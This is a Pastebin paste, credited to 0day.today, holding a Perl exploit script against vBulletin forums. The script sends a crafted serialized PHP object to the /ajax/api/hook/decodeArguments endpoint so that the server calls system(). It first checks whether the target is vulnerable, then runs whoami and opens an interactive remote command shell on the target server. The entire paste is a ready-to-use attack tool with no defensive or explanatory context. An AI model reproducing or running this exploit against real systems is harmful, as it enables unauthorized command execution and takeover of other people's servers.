Advertisement
Guest User

VEiN da eGoD

a guest
Nov 27th, 2015
375
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.45 KB | None | 0 0
  1. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  2.  
  3. use LWP::UserAgent;
  4. use LWP::Simple;
  5. $ua = LWP::UserAgent ->new;
  6.  
  7. print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
  8. print "\n\n \t Enter Target : ";
  9. $Target=<STDIN>;
  10. chomp($Target);
  11.  
  12.  
  13. $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
  14.  
  15. $source=$response->decoded_content;
  16. if (($source =~ m/4276158464/i))
  17. {
  18.     $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
  19.     $user=$response->decoded_content;
  20.     chomp($user);
  21.     print "\n Target Vulnerable ;)\n";
  22.     while($cmd=="exit")
  23.     {
  24.         print "\n\n$user\$ ";
  25.         $cmd=<STDIN>;
  26.         chomp($cmd);
  27.         if($cmd =~ m/exit/i){exit 0;}
  28.         $len=length($cmd);
  29.         $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
  30.         print "\n".$response->decoded_content;
  31.  
  32.    }
  33. }else{print "\ntarget is not Vulnerable\n\n"}
  34.  
  35. #  0day.today [2015-11-27]  #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement